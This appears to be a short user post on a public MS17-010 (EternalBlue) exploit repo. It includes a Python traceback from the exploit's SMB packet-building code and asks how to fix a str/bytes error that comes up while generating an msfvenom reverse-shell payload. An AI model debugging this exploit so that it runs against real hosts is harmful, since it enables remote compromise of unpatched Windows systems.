  File "zzz_exploit.py", line 469, in exploit_matched_pairs
    info.update(leak_frag_size(conn, tid, fid))
  File "zzz_exploit.py", line 313, in leak_frag_size
    req1 = conn.create_nt_trans_packet(5, param=pack('<HH', fid, 0), mid=mid, data='A'*0x10d0, maxParameterCount=GROOM_TRANS_SIZE-0x10d0-TRANS_NAME_LEN)
  File "C:\Users\admin\Downloads\AutoBlue-MS17-010-master\mysmb.py", line 375, in create_nt_trans_packet
    _put_trans_data(transCmd, param, data, noPad)
  File "C:\Users\admin\Downloads\AutoBlue-MS17-010-master\mysmb.py", line 83, in _put_trans_data
    transData += (b'\x00' * padLen) + data
TypeError: can't concat str to bytes

Hi, thank you so much for sharing the repo.
I have an issue with generating a reverse shell with msfvenom using the shellcode compiler. The compiler shows this syntax error regardless I respond with 'y' or 'n'.
May I know how can I fix this?